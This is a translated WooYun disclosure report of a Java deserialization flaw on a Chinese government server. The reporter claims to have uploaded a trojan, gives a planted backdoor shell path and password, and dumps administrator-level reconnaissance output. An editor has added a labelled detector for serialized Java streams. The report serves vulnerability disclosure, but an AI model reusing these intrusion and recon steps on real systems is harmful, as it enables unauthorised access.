WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2015-12-27: Details reported to the vendor; awaiting the vendor's handling
2015-12-31: Vendor has confirmed; details disclosed to the vendor only
2016-01-10: Details disclosed to core white hats and experts in the relevant field
2016-01-20: Details disclosed to regular white hats
2016-01-30: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public
As stated in the title.
Opening the official site at http://**.**.**.**/, the link marked in the screenshot is vulnerable.
The address **.**.**.**:7086/ has a "Java deserialization" vulnerability.
A trojan was uploaded directly to the server.
Also included: a backdoor shell planted on the site at **.**.**.**:7001/legioff/dataProcess.jsp, password: password
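An added detection example (written for this edit, not the reporter's code and not from the page): it flags request bodies that carry a Java serialized object stream, raw or base64-encoded, which is exactly the input a Java deserialization endpoint such as the one reported on port 7086 consumes. All sample bodies are constructed; no real host or path from the report is used.

```python
"""Flag HTTP request bodies that carry a Java serialized object stream.

Added example (not the reporter's code). Every Java serialization stream
starts with the magic 0xAC 0xED and stream version 0x00 0x05; when such a
stream is base64-encoded for an HTTP parameter or cookie, that header always
encodes to the prefix "rO0AB". All sample inputs below are constructed.
"""
import base64
import re

JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
# base64 text starting with the encoded magic, followed by enough body to matter
B64_CANDIDATE = re.compile(rb"rO0AB[A-Za-z0-9+/=]{8,}")


def find_java_serial(body: bytes) -> list[str]:
    """Return findings ("raw:offset=N" / "base64:offset=N"), empty if clean."""
    findings = []
    if JAVA_SERIAL_MAGIC in body:
        findings.append("raw:offset=%d" % body.index(JAVA_SERIAL_MAGIC))
    for m in B64_CANDIDATE.finditer(body):
        token = m.group(0)
        try:
            # pad to a multiple of 4 so a truncated token still decodes
            decoded = base64.b64decode(token + b"=" * (-len(token) % 4))
        except ValueError:
            continue
        # "rO0AB" alone only proves 0xAC 0xED 0x00; check the full header
        if decoded.startswith(JAVA_SERIAL_MAGIC):
            findings.append("base64:offset=%d" % m.start())
    return findings


# Constructed samples: a raw stream, a base64-encoded one, and two clean bodies
_STREAM = b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap"
SAMPLES = {
    "raw": b"POST /invoke HTTP/1.1\r\nContent-Type: application/octet-stream\r\n\r\n" + _STREAM,
    "b64": b"JSESSIONID=abc; state=" + base64.b64encode(_STREAM),
    "lookalike": b"token=rO0ABAAAAAAAAAAAAA",   # decodes to AC ED 00 04..., not a stream
    "clean": b"user=admin&lang=zh-cn",
}


def scan_samples() -> dict[str, list[str]]:
    """Run the detector over every sample and return findings per name."""
    return {name: find_java_serial(body) for name, body in SAMPLES.items()}
```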
net share
共享名       资源                            注释
-------------------------------------------------------------------------------
C$           C:\                             默认共享
E$           E:\                             默认共享
ADMIN$       C:\WINDOWS                      远程管理
G$           G:\                             默认共享
D$           D:\                             默认共享
IPC$                                         远程 IPC
photo        E:\oracle\Middleware\user_projects\domains\legioff\IdPhoto
命令成功完成。

net view
服务器名称            注释
-------------------------------------------------------------------------------
\\HQGLAPP
\\NX
\\NXFZB
\\NXFZB-C6A133BB1
\\NXJGJDATASERVER     nxjgj hqgl-data server
\\NXTAYA
\\NXXF5
\\XFTRS
命令成功完成。

net start
已经启动以下 Windows 服务:
   360EntClientService
   Application Experience Lookup Service
   Application Layer Gateway Service
   Automatic Updates
   COM+ Event System
   Computer Browser
   Cryptographic Services
   DCOM Server Process Launcher
   DHCP Client
   DNS Client
   Event Log
   HID Input Service
   Logical Disk Manager
   Network Connections
   Network Location Awareness (NLA)
   OracleOraDb10g_home1TNSListener
   OracleServiceLEGIOFF
   Plug and Play
   Protected Storage
   Remote Procedure Call (RPC)
   Security Accounts Manager
   Server
   Shell Hardware Detection
   System Event Notification
   Task Scheduler
   TCP/IP NetBIOS Helper
   Terminal Services
   Windows Audio
   Windows Firewall/Internet Connection Sharing (ICS)
   Windows Management Instrumentation
   Windows Time
   Wireless Configuration
   Workstation
   主动防御
命令成功完成。

net user
\\NXFZB-C6A133BB1 的用户帐户
-------------------------------------------------------------------------------
__SUNLOGIN_USER__        Administrator            Guest
SUPPORT_388945a0
命令成功完成。

whoami
nxfzb-c6a133bb1\administrator

netstat -ano
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  [roughly 110 TCP/UDP entries omitted here: every address in the original is masked as **.**.**.**]

ipconfig /all
Windows IP Configuration
   Host Name . . . . . . . . . . . . : nxfzb-c6a133bb1
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接 2:
   Media State . . . . . . . . . . . : Media disconnected
   Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #2
   Physical Address. . . . . . . . . : E4-1F-13-E3-0D-1A
Ethernet adapter 本地连接:
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client)
   Physical Address. . . . . . . . . : E4-1F-13-E3-0D-18
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : **.**.**.**
   Subnet Mask . . . . . . . . . . . : **.**.**.**
   Default Gateway . . . . . . . . . : **.**.**.**
   DNS Servers . . . . . . . . . . . : **.**.**.**
Ethernet adapter 本地连接 3:
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : IBM USB Remote NDIS Network Device
   Physical Address. . . . . . . . . : E6-1F-13-E4-0D-1B
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IP Address. . . . . . . . . . . . : **.**.**.**
   Subnet Mask . . . . . . . . . . . : **.**.**.**
   Default Gateway . . . . . . . . . :
   DHCP Server . . . . . . . . . . . : **.**.**.**
   Lease Obtained. . . . . . . . . . : 2015年12月25日 1:31:17
   Lease Expires . . . . . . . . . . : 2015年12月25日 1:41:17

tasklist /svc
映像名称                       PID 服务
========================= ======== ============================================
System Idle Process              0 暂缺
System                           4 暂缺
smss.exe                       320 暂缺
csrss.exe                      368 暂缺
winlogon.exe                   392 暂缺
services.exe                   440 Eventlog, PlugPlay
lsass.exe                      452 ProtectedStorage, SamSs
svchost.exe                    608 DcomLaunch
svchost.exe                    696 RpcSs
svchost.exe                    776 Dhcp, Dnscache
svchost.exe                    824 LmHosts, W32Time
svchost.exe                    840 AeLookupSvc, AudioSrv, Browser, CryptSvc, dmserver, EventSystem, HidServ, lanmanserver, lanmanworkstation, Netman, Nla, Schedule, SENS, SharedAccess, ShellHWDetection, winmgmt, wuauserv, WZCSVC
ZhuDongFangYu.exe              856 ZhuDongFangYu
360EntClient.exe              1136 360EntClientSvc
TNSLSNR.EXE                   1216 OracleOraDb10g_home1TNSListener
oracle.exe                    1476 OracleServiceLEGIOFF
explorer.exe                  1944 暂缺
360EntClient.exe               584 暂缺
wmiprvse.exe                  2168 暂缺
360tray.exe                   2248 暂缺
svchost.exe                   2916 TermService
alg.exe                       3020 ALG
ctfmon.exe                    1552 暂缺
360sd.exe                     1628 暂缺
ctfmon.exe                     512 暂缺
360rp.exe                     3168 暂缺
csrss.exe                     3924 暂缺
winlogon.exe                  3968 暂缺
rdpclip.exe                   1956 暂缺
explorer.exe                  1876 暂缺
ctfmon.exe                    3644 暂缺
ctfmon.exe                    3676 暂缺
conime.exe                     884 暂缺
cmd.exe                       2472 暂缺
java.exe                      3852 暂缺
conime.exe                    1652 暂缺
logon.scr                     6800 暂缺
findstr.exe                   7956 暂缺
wmiprvse.exe                  6228 暂缺
tasklist.exe                  7572 暂缺

systeminfo
主机名:           NXFZB-C6A133BB1
OS 名称:          Microsoft(R) Windows(R) Server 2003 Enterprise x64 Edition
OS 版本:          5.2.3790 Service Pack 2 Build 3790
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:     NXFZB
注册的组织:       NXFZB
产品 ID:          91353-640-9271162-50448
初始安装日期:     2011-1-17, 10:53:51
系统启动时间:     36 天 10 小时 49 分 8 秒
系统制造商:       IBM
系统型号:         System x3850 X5 -[7145N8B]-
系统类型:         x64-based PC
处理器:           安装了 16 个处理器。
                  [01]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [02]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [03]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [04]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [05]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [06]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [07]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [08]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [09]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [10]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [11]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [12]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [13]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [14]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [15]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
                  [16]: EM64T Family 6 Model 46 Stepping 6 GenuineIntel ~1862 Mhz
BIOS 版本:        UNKNOWN
Windows 目录:     C:\WINDOWS
系统目录:         C:\WINDOWS\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     8,177 MB
可用的物理内存:   792 MB
页面文件: 最大值: 7,721 MB
页面文件: 可用:   878 MB
页面文件: 使用中: 6,843 MB
页面文件位置:     暂缺
域:               WORKGROUP
登录服务器:       \\NXFZB-C6A133BB1
修补程序:         安装了 355 个修补程序。
                  [hotfix list omitted: entries [01]-[176] read only "File 1", entries [177]-[242] are bare KB numbers, and the original is cut off mid-list at [243]]
网卡:             安装了 3 个 NIC。
                  [01]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client)
                        连接名:      本地连接
                        启用 DHCP:   否
                        IP 地址
                        [01]: **.**.**.**
                  [02]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client)
                        连接名:      本地连接 2
                        状态:        媒体连接已中断
                  [03]: IBM USB Remote NDIS Network Device
                        连接名:      本地连接 3
                        启用 DHCP:   是
                        DHCP 服务器: **.**.**.**
                        IP 地址
                        [01]: **.**.**.**
Raise security awareness.
Severity: High
Vulnerability Rank: 12
Confirmation time: 2015-12-31 18:05
CNVD confirmed and reproduced the described situation; it has been forwarded via CNCERT to the Ningxia branch center, which will coordinate handling with the website's administering organization.
None yet